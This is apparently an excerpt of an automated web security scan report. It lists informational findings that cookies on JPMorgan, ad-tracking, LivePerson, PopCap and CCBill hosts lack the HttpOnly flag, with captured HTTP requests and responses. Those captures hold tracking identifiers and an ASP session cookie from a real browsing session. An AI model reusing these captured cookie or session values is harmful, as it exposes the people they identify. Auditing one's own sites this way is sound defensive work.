http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
(function(){var A=YAHOO.util;A.Selector
...[SNIP]...

11.166. https://mm.jpmorgan.com/js/yui/tabview-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/yui/tabview-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:54 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"9929-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:54 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 9929
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2009, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.8.0r4
*/
(function(){var B=YAHOO.util,C=B.Dom,H=B.Eve
...[SNIP]...

11.167. https://mm.jpmorgan.com/js/yui/treeview-min.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/yui/treeview-min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:54 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"34319-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:54 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 34319
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2010, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.com/yui/license.html
version: 2.8.1
*/
(function(){var D=YAHOO.util.Dom,B=YAHO
...[SNIP]...

11.168. https://mm.jpmorgan.com/js/yui/yahoo-dom-event.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mm.jpmorgan.com
Path:	/js/yui/yahoo-dom-event.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R1627792095; path=/; expires=Wed, 13-Jul-2011 16:42:56 GMT
Date: Tue, 12 Jul 2011 16:29:49 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e mod_jk/1.2.31
Accept-Ranges: bytes
ETag: W/"37005-1310119356000"
Last-Modified: Fri, 08 Jul 2011 10:02:36 GMT
Cache-Control: max-age=300
Expires: Tue, 12 Jul 2011 16:34:49 GMT
Vary: Accept-Encoding
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 37005
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

/*
Copyright (c) 2009, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.8.0r4
*/
if(typeof YAHOO=="undefined"||!YAHOO){
...[SNIP]...

11.169. http://pixel.mathtag.com/data/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.mathtag.com
Path:	/data/img

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ts=1310503211; domain=.mathtag.com; path=/; expires=Wed, 11-Jul-2012 20:40:11 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.170. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=EOIAFPaeApll_6ixz4EBrAEBmgeBlw4ZrRpcjB9uThocKRkvrhkb4gzhXR4Q0Q4Q0ZOG_RGqL5EogQ9w4RB8gRmhDlTzDRuzCl4UAwUAyBO0HFO5E9FOEA_TD4sqgQAAyE8Rw9pLsQ; expires=Mon, 10-Oct-2011 20:39:25 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.171. http://pixel.rubiconproject.com/d.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/d.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rpb=5576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%265575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1%26733%3D1; expires=Thu, 11-Aug-2011 20:40:10 GMT; path=/; domain=.rubiconproject.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.172. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

rpb=5576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%265575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1; expires=Thu, 11-Aug-2011 20:39:53 GMT; path=/; domain=.rubiconproject.com
rpx=4212%3D11993%2C1032%2C4%2C%2C%265421%3D11993%2C682%2C3%2C%2C%265852%3D12124%2C721%2C3%2C%2C%264214%3D12267%2C471%2C2%2C%2C%266432%3D12470%2C499%2C2%2C%2C%265576%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C%267249%3D12753%2C0%2C1%2C%2C%262112%3D12753%2C0%2C1%2C%2C%262497%3D12753%2C0%2C1%2C%2C%262202%3D12753%2C0%2C1%2C%2C%262496%3D12753%2C0%2C1%2C%2C%262197%3D12753%2C0%2C1%2C%2C%262579%3D12753%2C0%2C1%2C%2C%263512%3D12753%2C0%2C1%2C%2C%263810%3D12753%2C0%2C1%2C%2C%262374%3D12753%2C0%2C1%2C%2C%264222%3D12770%2C86%2C2%2C%2C%265575%3D12844%2C0%2C1%2C%2C%262114%3D12857%2C0%2C1%2C%2C%264894%3D12881%2C0%2C1%2C%2C%266286%3D12945%2C139%2C4%2C%2C%264120%3D13027%2C0%2C1%2C%2C%266811%3D13380%2C0%2C2%2C%2C; expires=Thu, 11-Aug-2011 20:39:53 GMT; path=/; domain=.pixel.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.173. http://r.turn.com/r/beacon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uid=4325897289836481830; Domain=.turn.com; Expires=Sun, 08-Jan-2012 16:35:47 GMT; Path=/
pf=S75Tx67zHlqJEqjM2EpYohyQmYHijzPhSURiZdWBt_mIAwkcA0x7pAMOQ8HX-tAoPwLHSpO1dFMRfUIqRRj7O8Bymq9LvAUz5_ne2Gc83NMHdxKvkIPObEkSzEZrTaygnQ3ziRBzpEB5dtK5nAeBUmYbbn7O8vmG9T4ZvTBxZ-fkUczbVJT5Cai6PVkpiYM250Hn9REtTxKxE8sY6J3ypnin2DltV7TDetw9hjspxXZhD8p41r9TwMfEMg-G1XemtTB2tozm01YLbZIiUMvmqnqcRK5l5t99h9o1nyRJGB_wu9pn5eTDfXokdHWgv_KeSzTQwXISudy28fYFPvd3f8VkEPtv4pKGwYcW3D48lxwQzHAAbxKgRVL2b1l3a-ZYStRSAsLDg3EjDE1-MNGS5MvaPliD3cX9A60XNjJY548KG_WLadoSJGb4bjShEkEZMGlUJzSoxDtdJd5C-xayMUeIxLF_gu6KpFvskgSkqDyRvL1xj_WZGBHL7tmny3OF86KonSkyTJZS2Pe0J-pv-0ZlHM0GPFGGYjp0ziZtko5hTj6dXRRh4QZTEXVL-ge7iEWTOvmvi1zjeqbpxK565E7aFVyxKpvzjSVsAgZL25tnEZo1QLIx3A2B_Zq8odU2eiU467uOPvqZNUB0D-Z1h-Ye081m6oj-PGJfEQ6zkfS-V8iUpuZ8eodRw_lv4giezXN6TUonRbapcFN61G2o5g0IZKzKM_gBe3dP1E8FWQkM2fHCdNoeFK3r8z3rr_IMZGe2RqXjfUSv4PoS9BBdLPDTtDv5lO-7qW24wGeBDKGVRc1PUdvmcIfa70fwlgva-qLtly5tg-N0KJMS8LqLG_FacEC-83hgcFizrbdl-nuZiKc3wX7GiaI0EAPGkBVFePfSQ9yWsEBRfjuW4AHrUV5yIcO0NRkDqgMD2WAQJbF49vWqArbDJ0yoqifuBT8rwLezGBmoueobB2WMNaTxX7mxpMrQn0yES1bZJmLjjZIAkmIJxZ7xeYCj5l4gUPXVoOVFXuczpXr_MUqk_vCUthA8oixyElU3ANl1dD2qYov9BuL8l-AQdbit5mSqhcAge1f9v2DKdrS7tpbkEM0iqxaG6RswzxutKhO2dQbnqnli05-eD_Or7WQnS-BLdBqYTneq0zKFqU49VNcF9tmltxT1NaEJFhMivfKM5iLXXLqA3JaBVqauWRwqI8S_3Fn-BME0WtjmL-sTf3Nf93Yws_1ud7s0IRU8-3diGW0YihRapWhNVwJ8XDqeMYmLmHyM3mIk7c61SB7-8FMxyiC0cSExJSH89TrP0KtOzOBfTvxHeJg54zjksNPu1zZwzGr7u7c4UKg_yErLQJ0YMrQaTHe0BGkQOaCtNgR397GwlpFMpZQrcO6DVQmpJqLrCO7vWAYrQFbx5r__P2OsEwDabv6-ufGYt0XCG8E1NsefbXzsQG48Hb_4YCrX9j8YOFwzlL7wHF61n06A78wdBUnw_3qGk8dpf23zBzZ7_iSkW1LOMSCUhd0R0x_cMO6r5__qTaR3ipdUC2utivZgqLqHLD-yqO6fpR1lhP8Zedk0K33X5JX5XybzWTLoWHcBwhx12hxg_p42eTH3yUmVmrDFWtD-IWnXZh1DCyIriOz-euhSpNmXzKI7JHUzsQgubpCr0mdnzZcTmsylkJAW1ccTwu_iUiq76dV6KWv7ygWscTVmC3YMVvTh6_xY8MMl9E6n-9RK0_l1NeBTl2ILEX52m6Q5kUHHzsBztnLAvmGkYSq8tICkY-ZC5dDhZ5KTLIH_WRUAyZF0LVsouafm1vlWe8-kD_qlMWuKHZ35EkcV9gvNX-0wo3lOomVgKFrOcQT6xUJWITG_43_30FYpbAkMd7Zbz-AKt6UVPMV5C7YzmVgAWIMgrao83tjG2LhMgTlrEosdVyiYkUv0nonkKf66fnnlOzVyS438ol7N4GeGwHdaOglNTO5ywZIRQinOutEqt6KbKBEKntCrb7D6e9iRa3ianVsa8MiDHTEWIi5V0LqJtieKL24UwL5hJC4BX20Zz5y_GGgIdUuyJds9aivGRyjWcqpaPTAjzGh5JPWCUUY_ncjEyl8hW5m6EeUIZscn-4DKBwi99P9RjrZE_dPetOdSseWVwQIkyfdrdePcNT3WyEkrexuDA-qqk5NTFsC_ByQmpvwrjjDb0J7HUp1JPqiZqnwZ2Go5gFw87E0mX-gZbv9puVGpdNS4dePD3rEUqTIjSZFc7HCOlZdFTBhQt4A-FXt7HgLTPKjvKf5KVmvAPipFhdTouhjm4kPiXzApwuLyi6QSYFNiPyjgY3lBpe16jsizuDZnGlGarhWrjLVHCsfqBtkFSkk1SR2w_LQXcfc7DxO-UAUeZsKJ1LvJSuWsg1SH4N8_SCcaTqmc1uF1dp4fIimKkPNOg_dvWujk-Cj7VuMxKaYMlwrje52Uk5uf9NUjcjmDMF-1AlpBVtJMI6JGdCbY2NTrM7fSz49bOAjLW0MnQwDQa-Nv56fQL3xrXetwOaAY94pbLyYsPY_cQCBLLJhWVnk_lzn51ZCBNx7hJnm5dzmxgMi0veCS6T8Z5drmGjNmeb-gwzIMUAVsybSv6VHcWhnJ7FV4AblxMpEP0Y4Z9EqMnp8_Ptdh8Vlhtd1gYA-UFdmq3XbM_G1i3gFKk4PvEglQliEj-apgE-QUPu46suvh10d0G0S8DH0wFapdtYn6ohVZwB_sfttfT1YXUa_yXy15CD2u-uL2x0k24zeqEwhSpaHXsFwWxuCYlbx3sc8b_L2880suANXVY7RQ0ghbVhqjWmaKlZJZyI31XFJMg_Xm3ZaeTQQI_73qieHyLOUlYyXWWsmaKjBW9zGwtWdK7Mq4vwOBlARYld_nFauuoG4pRJN5QW0S4Ab_1nMPuF7At7uTRRiqDaV84E--0JgS5fcQqBMnq0HjkRtgk-XMCUZPiJUYVr5I10hlfZFNvymYKjSCq8EtoB0SCR3g100hLwHmY-Bd0Px_ERQa4V8H03Ad47KIDq9L6hWd8EKxxuk70qq5bXgGe0BBwIcaAGo124_Fpc9B9PFgRwf7L48PocBRONLy3d-V4PRgNjGQd8w36iokpDpKkptN7UsKIOKbVuNydbjtyAC4c1Iwtu4KcdbHriwFkNHZ84RB467ymyeh38Hrbp8Hb8-H8l8B1Z3JWEnD4C5pe-t0ccouIbg8SdMpwrtgnNNEVhmnTlU60JId0MOL6TZt0DdlgiUII8665euFIvTFi1kq9Jbjc-hN8nNe5t33s_4slnCqQsf7S3WAlj03YWHyJRno5upAQH1stolYHPvqQTECcUpZ67ooRzBV4mkY3bKZEn_LF-ss2qc9_oFL9fN5_ShqXOpZWPh4CRijgdjXszUE1r9Us2uEGPpDbSA5CU09EIO8uHCZTpQ2E0CSOfk4oag3R69kTz8pBBQ8HMWQVbWm; Domain=.turn.com; Expires=Sun, 08-Jan-2012 16:35:47 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.174. http://sales.liveperson.net/hc/57386690/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/57386690/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickACTIVE=1310489176287; expires=Wed, 13-Jul-2011 16:46:16 GMT; path=/
HumanClickSiteContainerID_57386690=STANDALONE; path=/hc/57386690
LivePersonID=-16101514677756-1310488556:-1:-1:-1:-1; expires=Wed, 11-Jul-2012 16:46:16 GMT; path=/hc/57386690; domain=.liveperson.net

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/57386690/?&site=57386690&cmd=mTagKnockPage&lpCallId=145196298370-793834505602&protV=20&lpjson=1&id=6411067731&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate?check=*n&jspStoreDir=hdus&contractId=2081191&itemAdd=true&orderId=131526257&quantity=1&catalogId=10053&orderItemId=339315499&langId=-1&URL=OrderItemDisplayViewShiptoAssoc&catEntryId=202349118&storeId=10051&calculationUsageId=-1&calculationUsageId=-2&calculationUsageId=-5&calculationUsageId=-6&calculationUsageId=-7&calculationUsageId=-8&calculationUsageId=-9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=265974457269152000; LivePersonID=-16101514677756-1310488556:-1:-1:-1:-1; HumanClickSiteContainerID_57386690=STANDALONE; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDQAQCCBQS=IPKCCCKDEINMHCPDPDNCPOFP; HumanClickACTIVE=1310489048524

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:46:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1310489176287; expires=Wed, 13-Jul-2011 16:46:16 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 12 Jul 2011 16:46:16 GMT
Set-Cookie: HumanClickSiteContainerID_57386690=STANDALONE; path=/hc/57386690
Set-Cookie: LivePersonID=-16101514677756-1310488556:-1:-1:-1:-1; expires=Wed, 11-Jul-2012 16:46:16 GMT; path=/hc/57386690; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1480

lpConnLib.Process({"ResultSet": {"lpCallId":"145196298370-793834505602","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

11.175. http://sales.liveperson.net/hc/57386690/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sales.liveperson.net
Path:	/hc/57386690/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

HumanClickKEY=8815151865458625120; path=/hc/57386690
HumanClickACTIVE=1310488556239; expires=Wed, 13-Jul-2011 16:35:56 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/57386690/?&site=57386690&cmd=mTagKnockPage&lpCallId=835862943902-376590710133&protV=20&lpjson=1&id=7510587419&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=-16101514677756-1308223637:-1:-1:-1:-1; LivePersonID=LP i=16101514677756,d=1305377522; ASPSESSIONIDQAQCCBQS=IPKCCCKDEINMHCPDPDNCPOFP

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:35:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=8815151865458625120; path=/hc/57386690
Set-Cookie: HumanClickACTIVE=1310488556239; expires=Wed, 13-Jul-2011 16:35:56 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Tue, 12 Jul 2011 16:35:56 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1480

lpConnLib.Process({"ResultSet": {"lpCallId":"835862943902-376590710133","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

11.176. http://store.popcap.com/cart.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://store.popcap.com
Path:	/cart.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lv=1310503701; expires=Fri, 06-Jul-2012 20:48:21 GMT; path=/; domain=.popcap.com
user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:21 GMT; path=/; domain=.popcap.com
user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:21 GMT; path=/; domain=.popcap.com
user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:21 GMT; path=/; domain=.popcap.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.177. https://store.popcap.com/payment.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://store.popcap.com
Path:	/payment.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

nickname=deleted; expires=Mon, 12-Jul-2010 20:48:31 GMT; path=/; domain=.popcap.com
user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com
user_profile=003000000000000; expires=Fri, 06-Jul-2012 20:48:32 GMT; path=/; domain=.popcap.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.178. https://support.ccbill.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.ccbill.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.179. https://support.ccbill.com/js/ga.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.ccbill.com
Path:	/js/ga.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.180. https://support.ccbill.com/style/css/base.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.ccbill.com
Path:	/style/css/base.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.181. https://support.ccbill.com/style/css/consumers.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.ccbill.com
Path:	/style/css/consumers.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.182. https://support.ccbill.com/style/img/background/body.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.ccbill.com
Path:	/style/img/background/body.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.183. https://support.ccbill.com/style/img/background/body_container.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.ccbill.com
Path:	/style/img/background/body_container.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.184. https://support.ccbill.com/style/img/background/main.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.ccbill.com
Path:	/style/img/background/main.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.185. https://support.ccbill.com/style/img/buttons/btn_search.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.ccbill.com
Path:	/style/img/buttons/btn_search.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.186. https://support.ccbill.com/style/img/icons/bullet_square_blk.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.ccbill.com
Path:	/style/img/icons/bullet_square_blk.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.187. https://support.ccbill.com/style/img/sprites/page_elements.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.ccbill.com
Path:	/style/img/sprites/page_elements.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TScc32cb=2fb8cfb87da158a51839e975aab43494baffbe77132cf7874e1c80e7; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.188. http://wallst.jpmorganchase.com/chase/services/MultiQuote/MultiQuote.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wallst.jpmorganchase.com
Path:	/chase/services/MultiQuote/MultiQuote.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

1304%5F0=CA246B4E9530F9524E18E150610AAD01; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /chase/services/MultiQuote/MultiQuote.asp?symbols=jpm&requestMethod=getFastQuote&realtime=0&outputFormat=json HTTP/1.1
Host: wallst.jpmorganchase.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorganchase.com/corporate/Home/home.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 12 Jul 2011 16:28:50 GMT
Content-Length: 73
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Set-Cookie: 1304%5F0=CA246B4E9530F9524E18E150610AAD01; path=/

var FastQuote = {"FastQuote":[{"symbol":"jpm","code":200,"last":39.66}]};

11.189. http://web.me.com/serverhodeisland/Serve_RI/Home.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://web.me.com
Path:	/serverhodeisland/Serve_RI/Home.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

mmr=nk11r10; Domain=web.me.com; Path=/serverhodeisland

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serverhodeisland/Serve_RI/Home.html HTTP/1.1
Host: web.me.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: AppleIDiskServer.1G301009
x-responding-server: hpng028-0
X-dmUser: serverhodeisland
Cache-Control: max-age=60, must-revalidate
ETag: "z-1g3s18hn-lp-trsyklu0i-a0vfmzemj0"
Last-Modified: Tue, 29 Mar 2011 18:26:34 GMT
Content-Type: text/html
Content-Length: 457
Vary: Accept-Encoding
Date: Wed, 13 Jul 2011 00:39:43 GMT
Connection: close
Set-Cookie: mmr=nk11r10; Domain=web.me.com; Path=/serverhodeisland

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
<title>Redirecting</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta na
...[SNIP]...

